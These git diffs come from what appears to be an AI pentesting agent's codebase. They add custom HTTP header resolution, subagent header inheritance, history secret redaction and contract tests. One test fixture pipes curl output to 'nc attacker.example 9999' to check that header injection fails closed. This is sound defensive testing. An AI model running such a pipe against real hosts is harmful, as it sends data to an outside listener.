+  if (existing.includes(ctx.target)) return ctx.session;
+  return {
+    ...ctx.session,
+    targets: [...existing, ctx.target],
+  };
 }
 
 /**

--- a/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
+++ b/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
@@ -144,12 +144,9 @@ Returns the worker's summary, objective results, and finding count — but NOT t
         const inheritedHeaders = ctx.session.config?.headers;
         try {
           const state = await ctx.browserSession.captureStorageState();
-          workerBrowserSession = new PlaywrightMcpSession(
-            undefined,
-            undefined,
-            undefined,
-            inheritedHeaders,
-          );
+          workerBrowserSession = new PlaywrightMcpSession({
+            extraHttpHeaders: inheritedHeaders,
+          });
           if (state) {
             await workerBrowserSession.seedStorageState(state);
           }
@@ -159,12 +156,9 @@ Returns the worker's summary, objective results, and finding count — but NOT t
           // that the lifecycle path is consistent and we still tear it
           // down on completion.
           if (!workerBrowserSession) {
-            workerBrowserSession = new PlaywrightMcpSession(
-              undefined,
-              undefined,
-              undefined,
-              inheritedHeaders,
-            );
+            workerBrowserSession = new PlaywrightMcpSession({
+              extraHttpHeaders: inheritedHeaders,
+            });
           }
         }
 

--- a/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
+++ b/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
@@ -2,6 +2,7 @@ import { tool } from "ai";
 import { z } from "zod";
 import { AgentEventBus } from "../../../eventBus";
 import { FindingsRegistry } from "../../../findings/registry";
+import { resolveEffectiveHeaders } from "../../../http/targetHeaders";
 import { PlaywrightMcpSession } from "./playwrightMcp";
 import type { ToolContext } from "./types";
 
@@ -139,9 +140,12 @@ Returns the worker's summary, objective results, and finding count — but NOT t
         !ctx.sandbox && !!ctx.browserSession?.isConnected();
 
       if (parentBrowserUsed && ctx.browserSession) {
-        // Inherit the parent session's headers so the worker browser
-        // sends them on every request (INV-subagent-inheritance).
-        const inheritedHeaders = ctx.session.config?.headers;
+        // Resolve session + credential layer headers so the worker
+        // browser carries the full set (INV-subagent-inheritance,
+        // INV-single-source).
+        const inheritedHeaders = target
+          ? resolveEffectiveHeaders(ctx.session, target)
+          : ctx.session.config?.headers;
         try {
           const state = await ctx.browserSession.captureStorageState();
           workerBrowserSession = new PlaywrightMcpSession({

--- a/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
+++ b/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
@@ -139,9 +139,17 @@ Returns the worker's summary, objective results, and finding count — but NOT t
         !ctx.sandbox && !!ctx.browserSession?.isConnected();
 
       if (parentBrowserUsed && ctx.browserSession) {
+        // Inherit the parent session's headers so the worker browser
+        // sends them on every request (INV-subagent-inheritance).
+        const inheritedHeaders = ctx.session.config?.headers;
         try {
           const state = await ctx.browserSession.captureStorageState();
-          workerBrowserSession = new PlaywrightMcpSession();
+          workerBrowserSession = new PlaywrightMcpSession(
+            undefined,
+            undefined,
+            undefined,
+            inheritedHeaders,
+          );
           if (state) {
             await workerBrowserSession.seedStorageState(state);
           }
@@ -151,7 +159,12 @@ Returns the worker's summary, objective results, and finding count — but NOT t
           // that the lifecycle path is consistent and we still tear it
           // down on completion.
           if (!workerBrowserSession) {
-            workerBrowserSession = new PlaywrightMcpSession();
+            workerBrowserSession = new PlaywrightMcpSession(
+              undefined,
+              undefined,
+              undefined,
+              inheritedHeaders,
+            );
           }
         }
 

--- a/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
+++ b/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
@@ -2,7 +2,10 @@ import { tool } from "ai";
 import { z } from "zod";
 import { AgentEventBus } from "../../../eventBus";
 import { FindingsRegistry } from "../../../findings/registry";
-import { resolveEffectiveHeaders } from "../../../http/targetHeaders";
+import {
+  resolveEffectiveHeaders,
+  stripBrowserManagedHeaders,
+} from "../../../http/targetHeaders";
 import { PlaywrightMcpSession } from "./playwrightMcp";
 import type { ToolContext } from "./types";
 
@@ -143,9 +146,11 @@ Returns the worker's summary, objective results, and finding count — but NOT t
         // Resolve session + credential layer headers so the worker
         // browser carries the full set (INV-subagent-inheritance,
         // INV-single-source).
-        const inheritedHeaders = target
-          ? resolveEffectiveHeaders(ctx.session, target)
-          : ctx.session.config?.headers;
+        const inheritedHeaders = stripBrowserManagedHeaders(
+          target
+            ? resolveEffectiveHeaders(ctx.session, target)
+            : ctx.session.config?.headers,
+        );
         try {
           const state = await ctx.browserSession.captureStorageState();
           workerBrowserSession = new PlaywrightMcpSession({

--- a/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
+++ b/src/core/agents/offSecAgent/tools/spawnPentestAgent.ts
@@ -143,9 +143,8 @@ Returns the worker's summary, objective results, and finding count — but NOT t
         !ctx.sandbox && !!ctx.browserSession?.isConnected();
 
       if (parentBrowserUsed && ctx.browserSession) {
-        // Resolve session + credential layer headers so the worker
-        // browser carries the full set (INV-subagent-inheritance,
-        // INV-single-source).
+        // Pass resolved headers to the worker browser so subagent
+        // requests inherit the session/credential layers.
         const inheritedHeaders = stripBrowserManagedHeaders(
           target
             ? resolveEffectiveHeaders(ctx.session, target)

--- a/src/core/agents/offSecAgent/tools/testEndpointVariations.ts
+++ b/src/core/agents/offSecAgent/tools/testEndpointVariations.ts
@@ -1,7 +1,11 @@
 import { tool } from "ai";
 import { z } from "zod";
 import { targetFetch } from "../../../http/targetHeaders";
-import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
+import {
+  assertUrlInScope,
+  resolverSessionFromCtx,
+  ScopeViolationError,
+} from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 /**
@@ -62,7 +66,11 @@ Use this to:
               request.headers = { Cookie: sessionCookie };
             }
 
-            const result = await targetFetch(ctx.session, endpoint, request);
+            const result = await targetFetch(
+              resolverSessionFromCtx(ctx),
+              endpoint,
+              request,
+            );
             const body = await result.text();
 
             results.push({

--- a/src/core/agents/offSecAgent/tools/testEndpointVariations.ts
+++ b/src/core/agents/offSecAgent/tools/testEndpointVariations.ts
@@ -1,5 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
@@ -61,7 +62,7 @@ Use this to:
               request.headers = { Cookie: sessionCookie };
             }
 
-            const result = await fetch(endpoint, request);
+            const result = await targetFetch(ctx.session, endpoint, request);
             const body = await result.text();
 
             results.push({

--- a/src/core/agents/offSecAgent/tools/webSearch.ts
+++ b/src/core/agents/offSecAgent/tools/webSearch.ts
@@ -45,6 +45,7 @@ async function braveSearch(
   url.searchParams.set("q", query);
   url.searchParams.set("count", "10");
 
+  // biome-ignore lint/style/noRestrictedGlobals: Brave Search API is infrastructure (not the pentest target); must not pass through targetFetch.
   const response = await fetch(url.toString(), {
     method: "GET",
     headers: {
@@ -135,6 +136,7 @@ COMMON SEARCH PATTERNS:
 
         // API key mode: authenticate directly without token exchange or signing
         if (cfg.pensarAPIKey && !cfg.accessToken) {
+          // biome-ignore lint/style/noRestrictedGlobals: Pensar Console (not the pentest target); must not pass through targetFetch.
           const response = await fetch(`${apiUrl}/agents/web_search`, {
             method: "POST",
             headers: {
@@ -186,6 +188,7 @@ COMMON SEARCH PATTERNS:
           body,
         );
 
+        // biome-ignore lint/style/noRestrictedGlobals: Pensar Console (not the pentest target); must not pass through targetFetch.
         const response = await fetch(`${apiUrl}/agents/web_search`, {
           method: "POST",
           headers: {

--- a/src/core/config/config.ts
+++ b/src/core/config/config.ts
@@ -5,6 +5,7 @@ import { getCurrentVersion } from "../installation";
 
 const DEFAULT_CONFIG: Config = {
   responsibleUseAccepted: false,
+  defaultHeaders: { "User-Agent": "pensar-apex" },
 };
 
 export interface Config {
@@ -47,6 +48,16 @@ export interface Config {
   gatewaySigningKey?: string | null;
   // Gateway URL for inference (server-issued, bypasses CloudFront timeout)
   gatewayUrl?: string | null;
+  /**
+   * Default custom HTTP headers seeded into every new session at create
+   * time (snapshot semantics — see INV-snapshot-stability in the
+   * headers plan). Mutated via `pensar config headers` or the TUI
+   * settings dialog. Empty record means "send no custom headers";
+   * absent means "fall back to the User-Agent default".
+   */
+  defaultHeaders?: Record<string, string>;
+  /** ISO timestamp of the last `defaultHeaders` mutation. */
+  defaultHeadersUpdatedAt?: string;
 }
 
 export async function init() {
@@ -92,6 +103,8 @@ function applyEnvFallbacks(parsedConfig: Partial<Config>): Config {
   return {
     ...parsedConfig,
     responsibleUseAccepted: parsedConfig.responsibleUseAccepted ?? false,
+    defaultHeaders:
+      parsedConfig.defaultHeaders ?? DEFAULT_CONFIG.defaultHeaders,
     surfaceIntegrationEnabled:
       parsedConfig.surfaceIntegrationEnabled ??
       parseBoolEnv(process.env.PENSAR_SURFACE_INTEGRATION),

--- a/src/core/config/config.ts
+++ b/src/core/config/config.ts
@@ -48,15 +48,8 @@ export interface Config {
   gatewaySigningKey?: string | null;
   // Gateway URL for inference (server-issued, bypasses CloudFront timeout)
   gatewayUrl?: string | null;
-  /**
-   * Default custom HTTP headers seeded into every new session at create
-   * time (snapshot semantics — see INV-snapshot-stability in the
-   * headers plan). Mutated via `pensar config headers` or the TUI
-   * settings dialog. Empty record means "send no custom headers";
-   * absent means "fall back to the User-Agent default".
-   */
+  /** Snapshotted into every new session at create time. */
   defaultHeaders?: Record<string, string>;
-  /** ISO timestamp of the last `defaultHeaders` mutation. */
   defaultHeadersUpdatedAt?: string;
 }
 

--- a/src/core/credentials/manager.ts
+++ b/src/core/credentials/manager.ts
@@ -175,12 +175,9 @@ export class CredentialManager {
   }
 
   /**
-   * Return stored credentials that have customHeaders set, with the
-   * header values intact. Consumed ONLY by the target-HTTP header
-   * resolver (`src/core/http/targetHeaders.ts`) to merge per-credential
-   * headers into outbound requests at the credential layer
-   * (INV-precedence-deterministic). Other consumers should use
-   * `listReferences()` which returns only key names.
+   * Stored credentials with their `customHeaders` intact. Consumed ONLY
+   * by the target-HTTP resolver — agent-facing code must use
+   * `listReferences()` which omits values.
    */
   listCredentialsWithHeaders(): Array<{
     tokens: { customHeaders: Record<string, string> };

--- a/src/core/credentials/manager.ts
+++ b/src/core/credentials/manager.ts
@@ -175,6 +175,28 @@ export class CredentialManager {
   }
 
   /**
+   * Return stored credentials that have customHeaders set, with the
+   * header values intact. Consumed ONLY by the target-HTTP header
+   * resolver (`src/core/http/targetHeaders.ts`) to merge per-credential
+   * headers into outbound requests at the credential layer
+   * (INV-precedence-deterministic). Other consumers should use
+   * `listReferences()` which returns only key names.
+   */
+  listCredentialsWithHeaders(): Array<{
+    tokens: { customHeaders: Record<string, string> };
+  }> {
+    const out: Array<{ tokens: { customHeaders: Record<string, string> } }> =
+      [];
+    for (const stored of this.store.values()) {
+      const headers = stored.tokens?.customHeaders;
+      if (headers && Object.keys(headers).length > 0) {
+        out.push({ tokens: { customHeaders: { ...headers } } });
+      }
+    }
+    return out;
+  }
+
+  /**
    * Remove a credential from the store.
    * Returns `true` if the credential existed and was removed.
    */

--- a/src/core/history.ts
+++ b/src/core/history.ts
@@ -39,13 +39,8 @@ export async function load(): Promise<string[]> {
 }
 
 /**
- * Append an entry. Skips consecutive duplicates.
- * Persists to disk in the background.
- *
- * Sanitizes secrets from `/headers add|set|import` and the CLI
- * `--header "Name: Value"` flag before persisting. We never want a
- * recalled history entry to leak an Authorization token onto disk or
- * into the live recall buffer.
+ * Append an entry. Skips consecutive duplicates and redacts header
+ * secrets before persisting. Writes are fire-and-forget.
  */
 export async function push(entry: string): Promise<void> {
   const sanitized = redactSecretsInHistoryEntry(entry);
@@ -58,12 +53,8 @@ export async function push(entry: string): Promise<void> {
   Storage.write(STORAGE_KEY, history).catch(() => {});
 }
 
-/**
- * Replace any `Name: Value` payload that follows a known header
- * subcommand with `Name: <redacted>`. Conservative on purpose:
- * a false positive only hides a benign value, but a false negative
- * persists a secret. The Name itself stays so recall is still useful.
- */
+// Replace the value following a header subcommand with `<redacted>`.
+// Conservative: a false positive only hides a benign value.
 export function redactSecretsInHistoryEntry(entry: string): string {
   const trimmed = entry.trimStart();
   const slashMatch = trimmed.match(

--- a/src/core/history.ts
+++ b/src/core/history.ts
@@ -41,15 +41,45 @@ export async function load(): Promise<string[]> {
 /**
  * Append an entry. Skips consecutive duplicates.
  * Persists to disk in the background.
+ *
+ * Sanitizes secrets from `/headers add|set|import` and the CLI
+ * `--header "Name: Value"` flag before persisting. We never want a
+ * recalled history entry to leak an Authorization token onto disk or
+ * into the live recall buffer.
  */
 export async function push(entry: string): Promise<void> {
+  const sanitized = redactSecretsInHistoryEntry(entry);
   const history = await ensureLoaded();
-  if (history[history.length - 1] === entry) return;
-  history.push(entry);
+  if (history[history.length - 1] === sanitized) return;
+  history.push(sanitized);
   if (history.length > MAX_ENTRIES) {
     history.splice(0, history.length - MAX_ENTRIES);
   }
   Storage.write(STORAGE_KEY, history).catch(() => {});
+}
+
+/**
+ * Replace any `Name: Value` payload that follows a known header
+ * subcommand with `Name: <redacted>`. Conservative on purpose:
+ * a false positive only hides a benign value, but a false negative
+ * persists a secret. The Name itself stays so recall is still useful.
+ */
+export function redactSecretsInHistoryEntry(entry: string): string {
+  const trimmed = entry.trimStart();
+  const slashMatch = trimmed.match(
+    /^(\/headers\s+(?:add|set|import)\s+)(.+)$/i,
+  );
+  if (slashMatch) {
+    const [, prefix, payload] = slashMatch;
+    const colon = payload.indexOf(":");
+    if (colon === -1) return entry;
+    return `${entry.slice(0, entry.length - payload.length)}${payload.slice(0, colon)}: <redacted>`;
+  }
+  return entry.replace(
+    /(--header(?:s-from)?[=\s]+)("?)([^"\s]+:)\s*[^"\s]+("?)/gi,
+    (_, prefix, openQuote, namePart, closeQuote) =>
+      `${prefix}${openQuote}${namePart} <redacted>${closeQuote}`,
+  );
 }
 
 /**

--- a/src/core/history.ts
+++ b/src/core/history.ts
@@ -76,7 +76,7 @@ export function redactSecretsInHistoryEntry(entry: string): string {
     return `${entry.slice(0, entry.length - payload.length)}${payload.slice(0, colon)}: <redacted>`;
   }
   return entry.replace(
-    /(--header(?:s-from)?[=\s]+)("?)([^"\s]+:)\s*[^"\s]+("?)/gi,
+    /(--header(?:s-from)?[=\s]+)("?)([^"\s]+:)\s*(?:[^"]*(?=")|[^"\s]+)("?)/gi,
     (_, prefix, openQuote, namePart, closeQuote) =>
       `${prefix}${openQuote}${namePart} <redacted>${closeQuote}`,
   );

--- a/src/core/history.ts
+++ b/src/core/history.ts
@@ -76,7 +76,7 @@ export function redactSecretsInHistoryEntry(entry: string): string {
     return `${entry.slice(0, entry.length - payload.length)}${payload.slice(0, colon)}: <redacted>`;
   }
   return entry.replace(
-    /(--header(?:s-from)?[=\s]+)("?)([^"\s]+:)\s*(?:[^"]*(?=")|[^"\s]+)("?)/gi,
+    /(--header[=\s]+)("?)([^"\s]+:)\s*(?:[^"]*(?=")|[^"\s]+)("?)/gi,
     (_, prefix, openQuote, namePart, closeQuote) =>
       `${prefix}${openQuote}${namePart} <redacted>${closeQuote}`,
   );

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -302,11 +302,9 @@ describe("applyHeadersToShellCommand", () => {
     const session = makeSession({
       config: { headers: { "User-Agent": "pensar-apex" } },
     });
-    const r = applyHeadersToShellCommand(
-      "nmap -sV example.com",
-      session,
-      ["example.com"],
-    );
+    const r = applyHeadersToShellCommand("nmap -sV example.com", session, [
+      "example.com",
+    ]);
     expect(r.status).toBe("no-headers");
     expect(r.command).toBe("nmap -sV example.com");
   });

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -1,14 +1,5 @@
-/**
- * Contract tests for the custom-headers subsystem.
- *
- * These pin the behaviours the rest of the codebase relies on: the
- * resolver's layering and scope check, the blessed `targetFetch`,
- * shell-command injection, history redaction, and the parser's error
- * contract.
- *
- * If you break one of these tests intentionally, also update the
- * corresponding INV-* doc in the resolver / parse files.
- */
+// Contract tests for the custom-headers subsystem: resolver layering/scope,
+// `targetFetch`, shell injection, history redaction, parser errors.
 
 import { mkdtempSync, rmSync } from "fs";
 import { writeFile } from "fs/promises";
@@ -174,7 +165,7 @@ describe("resolveEffectiveHeaders", () => {
     expect(rec["X-Session"]).toBe("1");
     expect(rec["X-Cred"]).toBe("1");
     expect(rec["X-Request"]).toBe("1");
-    // INV-precedence-deterministic: request beats credential beats session
+    // request > credential > session
     expect(rec["X-Both"]).toBe("from-request");
   });
 
@@ -243,9 +234,7 @@ describe("targetFetch", () => {
   });
 
   it("preserves caller overrides on out-of-scope URLs", async () => {
-    // INV-scope-bound applies only to the resolver-injected layers
-    // (session/global/credential). Caller-explicit overrides like
-    // `Accept` for research URLs must pass through.
+    // Caller-explicit overrides bypass scope (resolver only gates injected layers).
     const session = makeSession({
       config: { headers: { Authorization: "Bearer secret" } },
     });
@@ -286,7 +275,7 @@ describe("applyHeadersToShellCommand", () => {
     expect(r.command).toContain(`-H "X-API-Key: abc"`);
   });
 
-  it("returns unknown-tool when the binary is not in the registry (INV-shell-injection)", () => {
+  it("returns unknown-tool when the binary is not in the registry", () => {
     const session = makeSession({
       config: { headers: { "X-API-Key": "abc" } },
     });
@@ -358,17 +347,13 @@ describe("applyHeadersToShellCommand", () => {
       "example.com",
     ]);
     expect(r.status).toBe("injected");
-    // Every shell-special character must be backslash-escaped inside
-    // the double-quoted -H argument.
     expect(r.command).toContain(`\\"quotes\\"`);
     expect(r.command).toContain(`\\$VAR`);
     expect(r.command).toContain("\\`cmd\\`");
   });
 
   it("fails closed on pipelines without whitespace before the operator", () => {
-    // Regression: COMMAND_SPLIT regex required `(?:^|\s)` before the
-    // operator, so `curl url|nc atk 9999` slipped past the pipeline
-    // check and headers got injected into a compound command.
+    // Regression: `curl url|nc atk 9999` previously slipped past the pipeline check.
     const session = makeSession({
       config: { headers: { "X-API-Key": "abc" } },
     });
@@ -382,8 +367,6 @@ describe("applyHeadersToShellCommand", () => {
   });
 
   it("does not treat operator characters inside quoted args as pipelines", () => {
-    // The fix for the no-whitespace pipeline case must not regress on
-    // legitimate commands whose quoted values contain `|`, `;`, or `&`.
     const session = makeSession({
       config: { headers: { "X-API-Key": "abc" } },
     });
@@ -397,9 +380,8 @@ describe("applyHeadersToShellCommand", () => {
   });
 
   it("emits a literal `\\n` (not a raw newline) for nikto -headers", () => {
-    // Regression: injectNikto previously embedded a 0x0A byte, which
-    // both breaks line-based persistent shells and is not what nikto
-    // expects as its header separator.
+    // Regression: injectNikto previously embedded a 0x0A byte, which broke
+    // line-based persistent shells.
     const session = makeSession({
       config: { headers: { "X-One": "1", "X-Two": "2" } },
     });
@@ -411,9 +393,8 @@ describe("applyHeadersToShellCommand", () => {
     expect(r.status).toBe("injected");
     expect(r.tool).toBe("nikto");
     expect(r.command).not.toContain("\n");
-    // shellQuote doubles the backslash so the surrounding shell strips
-    // exactly one layer, leaving nikto with the literal two-byte `\n`
-    // sequence as its header separator.
+    // Doubled backslash so the surrounding shell strips one layer and
+    // nikto sees the literal two-byte `\n`.
     expect(r.command).toContain("X-One: 1\\\\nX-Two: 2");
   });
 });
@@ -444,8 +425,7 @@ describe("redactSecretsInHistoryEntry", () => {
   });
 
   it("masks multi-word quoted --header values (Bearer <token>)", () => {
-    // Regression: a previous regex stopped at the first whitespace in
-    // the value, leaving the token after "Bearer " on disk.
+    // Regression: prior regex stopped at the first whitespace in the value.
     const r = redactSecretsInHistoryEntry(
       `pensar pentest --header "Authorization: Bearer super-secret-token"`,
     );

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -298,6 +298,31 @@ describe("applyHeadersToShellCommand", () => {
     expect(r.status).toBe("unknown-tool");
   });
 
+  it("returns no-headers for known non-HTTP tools like nmap", () => {
+    const session = makeSession({
+      config: { headers: { "User-Agent": "pensar-apex" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "nmap -sV example.com",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("no-headers");
+    expect(r.command).toBe("nmap -sV example.com");
+  });
+
+  it("returns no-headers for non-HTTP tools behind sudo/timeout wrappers", () => {
+    const session = makeSession({
+      config: { headers: { "User-Agent": "pensar-apex" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "sudo timeout 60 nmap -p- example.com",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("no-headers");
+  });
+
   it("returns no-headers when no in-scope host is present on the command", () => {
     const session = makeSession({
       config: { headers: { "X-API-Key": "abc" } },

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -241,6 +241,30 @@ describe("targetFetch", () => {
 
     spy.mockRestore();
   });
+
+  it("preserves caller overrides on out-of-scope URLs", async () => {
+    // INV-scope-bound applies only to the resolver-injected layers
+    // (session/global/credential). Caller-explicit overrides like
+    // `Accept` for research URLs must pass through.
+    const session = makeSession({
+      config: { headers: { Authorization: "Bearer secret" } },
+    });
+    const spy = vi
+      .spyOn(globalThis, "fetch")
+      .mockResolvedValue(new Response("ok"));
+
+    await targetFetch(session, "https://cve.example.org/writeup", {
+      headers: { Accept: "text/html", "Accept-Language": "en-US" },
+    });
+
+    const init = spy.mock.calls[0][1] as RequestInit;
+    expect(init.headers).toEqual({
+      Accept: "text/html",
+      "Accept-Language": "en-US",
+    });
+
+    spy.mockRestore();
+  });
 });
 
 // ---------------------------------------------------------------------------
@@ -300,6 +324,25 @@ describe("applyHeadersToShellCommand", () => {
     expect(r.command).not.toContain(`X-API-Key: from-session`);
     expect(r.command).toContain(`X-Other: 1`);
   });
+
+  it("shell-escapes values containing quotes, dollar, and backticks", () => {
+    const session = makeSession({
+      config: {
+        headers: { "X-Risky": 'val with "quotes" and $VAR and `cmd`' },
+      },
+    });
+    const r = applyHeadersToShellCommand(
+      "curl https://example.com/",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("injected");
+    // Every shell-special character must be backslash-escaped inside
+    // the double-quoted -H argument.
+    expect(r.command).toContain(`\\"quotes\\"`);
+    expect(r.command).toContain(`\\$VAR`);
+    expect(r.command).toContain("\\`cmd\\`");
+  });
 });
 
 // ---------------------------------------------------------------------------
@@ -325,6 +368,16 @@ describe("redactSecretsInHistoryEntry", () => {
     );
     expect(r).not.toContain("xyz");
     expect(r).toContain("Authorization: <redacted>");
+  });
+
+  it("masks multi-word quoted --header values (Bearer <token>)", () => {
+    // Regression: a previous regex stopped at the first whitespace in
+    // the value, leaving the token after "Bearer " on disk.
+    const r = redactSecretsInHistoryEntry(
+      `pensar pentest --header "Authorization: Bearer super-secret-token"`,
+    );
+    expect(r).not.toContain("super-secret-token");
+    expect(r).toContain(`"Authorization: <redacted>"`);
   });
 
   it("leaves unrelated commands untouched", () => {

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -331,11 +331,9 @@ describe("applyHeadersToShellCommand", () => {
         headers: { "X-Risky": 'val with "quotes" and $VAR and `cmd`' },
       },
     });
-    const r = applyHeadersToShellCommand(
-      "curl https://example.com/",
-      session,
-      ["example.com"],
-    );
+    const r = applyHeadersToShellCommand("curl https://example.com/", session, [
+      "example.com",
+    ]);
     expect(r.status).toBe("injected");
     // Every shell-special character must be backslash-escaped inside
     // the double-quoted -H argument.

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -323,7 +323,7 @@ describe("redactSecretsInHistoryEntry", () => {
     const r = redactSecretsInHistoryEntry(
       `pensar pentest --target https://example.com --header "Authorization: Bearer xyz"`,
     );
-    expect(r).not.toContain("Bearer xyz");
+    expect(r).not.toContain("xyz");
     expect(r).toContain("Authorization: <redacted>");
   });
 

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -364,6 +364,58 @@ describe("applyHeadersToShellCommand", () => {
     expect(r.command).toContain(`\\$VAR`);
     expect(r.command).toContain("\\`cmd\\`");
   });
+
+  it("fails closed on pipelines without whitespace before the operator", () => {
+    // Regression: COMMAND_SPLIT regex required `(?:^|\s)` before the
+    // operator, so `curl url|nc atk 9999` slipped past the pipeline
+    // check and headers got injected into a compound command.
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "curl https://example.com/|nc attacker.example 9999",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("unknown-tool");
+    expect(r.tool).toBeNull();
+  });
+
+  it("does not treat operator characters inside quoted args as pipelines", () => {
+    // The fix for the no-whitespace pipeline case must not regress on
+    // legitimate commands whose quoted values contain `|`, `;`, or `&`.
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const r = applyHeadersToShellCommand(
+      `curl -H "X-Custom: a|b;c&d" https://example.com/`,
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("injected");
+    expect(r.tool).toBe("curl");
+  });
+
+  it("emits a literal `\\n` (not a raw newline) for nikto -headers", () => {
+    // Regression: injectNikto previously embedded a 0x0A byte, which
+    // both breaks line-based persistent shells and is not what nikto
+    // expects as its header separator.
+    const session = makeSession({
+      config: { headers: { "X-One": "1", "X-Two": "2" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "nikto -h https://example.com",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("injected");
+    expect(r.tool).toBe("nikto");
+    expect(r.command).not.toContain("\n");
+    // shellQuote doubles the backslash so the surrounding shell strips
+    // exactly one layer, leaving nikto with the literal two-byte `\n`
+    // sequence as its header separator.
+    expect(r.command).toContain("X-One: 1\\\\nX-Two: 2");
+  });
 });
 
 // ---------------------------------------------------------------------------

--- a/src/core/http/headers.contract.test.ts
+++ b/src/core/http/headers.contract.test.ts
@@ -1,0 +1,363 @@
+/**
+ * Contract tests for the custom-headers subsystem.
+ *
+ * These pin the behaviours the rest of the codebase relies on: the
+ * resolver's layering and scope check, the blessed `targetFetch`,
+ * shell-command injection, history redaction, and the parser's error
+ * contract.
+ *
+ * If you break one of these tests intentionally, also update the
+ * corresponding INV-* doc in the resolver / parse files.
+ */
+
+import { mkdtempSync, rmSync } from "fs";
+import { writeFile } from "fs/promises";
+import { tmpdir } from "os";
+import { join } from "path";
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
+import { redactSecretsInHistoryEntry } from "../history";
+import {
+  formatParseError,
+  parseHeaderLine,
+  parseHeadersFromFile,
+} from "./parse";
+import {
+  applyHeadersToShellCommand,
+  type ResolverSession,
+  resolveEffectiveHeaders,
+  targetFetch,
+} from "./targetHeaders";
+import { isSensitiveHeaderName, renderHeaderValue } from "./types";
+
+function makeSession(
+  overrides: Partial<ResolverSession> = {},
+): ResolverSession {
+  return {
+    targets: ["https://example.com"],
+    config: { headers: { "X-Test": "1" } },
+    ...overrides,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// parseHeaderLine — total parser contract
+// ---------------------------------------------------------------------------
+
+describe("parseHeaderLine", () => {
+  it("accepts Name: Value", () => {
+    const r = parseHeaderLine("X-API-Key: abc");
+    expect(r.ok).toBe(true);
+    if (r.ok) {
+      expect(r.value.name).toBe("X-API-Key");
+      expect(r.value.value).toBe("abc");
+    }
+  });
+
+  it("strips a leading -H curl prefix and surrounding quotes", () => {
+    const r = parseHeaderLine(`-H "Authorization: Bearer xyz"`);
+    expect(r.ok).toBe(true);
+    if (r.ok) {
+      expect(r.value.name).toBe("Authorization");
+      expect(r.value.value).toBe("Bearer xyz");
+    }
+  });
+
+  it("rejects a missing colon", () => {
+    const r = parseHeaderLine("X-API-Key abc");
+    expect(r.ok).toBe(false);
+    if (!r.ok) expect(r.error.kind).toBe("missing-colon");
+  });
+
+  it("rejects whitespace in the name", () => {
+    const r = parseHeaderLine("X API: abc");
+    expect(r.ok).toBe(false);
+    if (!r.ok) expect(r.error.kind).toBe("name-has-whitespace");
+  });
+
+  it("rejects CRLF in the value (injection guard)", () => {
+    const r = parseHeaderLine("X: a\r\nInjected: 1");
+    expect(r.ok).toBe(false);
+    if (!r.ok) expect(r.error.kind).toBe("crlf-in-value");
+  });
+
+  it("never throws — totality", () => {
+    const inputs = ["", ":", "a:", ":b", "no colon", "x\nx: y"];
+    for (const i of inputs) {
+      expect(() => parseHeaderLine(i)).not.toThrow();
+    }
+  });
+
+  it("formatParseError never includes the raw value", () => {
+    const r = parseHeaderLine("Authorization Bearer secret-token-abc-123");
+    expect(r.ok).toBe(false);
+    if (!r.ok) {
+      const formatted = formatParseError(r.error);
+      expect(formatted).not.toContain("secret-token-abc-123");
+    }
+  });
+});
+
+// ---------------------------------------------------------------------------
+// parseHeadersFromFile — JSON and Name:Value branches
+// ---------------------------------------------------------------------------
+
+describe("parseHeadersFromFile", () => {
+  let tmp: string;
+
+  beforeEach(() => {
+    tmp = mkdtempSync(join(tmpdir(), "headers-contract-"));
+  });
+  afterEach(() => {
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  it("parses JSON object", async () => {
+    const file = join(tmp, "h.json");
+    await writeFile(file, JSON.stringify({ "X-API-Key": "abc" }));
+    const r = await parseHeadersFromFile(file);
+    expect(r.ok).toBe(true);
+    if (r.ok) expect(r.value[0].name).toBe("X-API-Key");
+  });
+
+  it("parses Name: Value lines with # comments", async () => {
+    const file = join(tmp, "h.txt");
+    await writeFile(file, "# a comment\nX-API-Key: abc\nUser-Agent: test\n");
+    const r = await parseHeadersFromFile(file);
+    expect(r.ok).toBe(true);
+    if (r.ok) expect(r.value).toHaveLength(2);
+  });
+
+  it("returns file-read-failed for a missing file", async () => {
+    const r = await parseHeadersFromFile(join(tmp, "does-not-exist"));
+    expect(r.ok).toBe(false);
+    if (!r.ok) expect(r.error[0].kind).toBe("file-read-failed");
+  });
+
+  it("rejects JSON with non-string values", async () => {
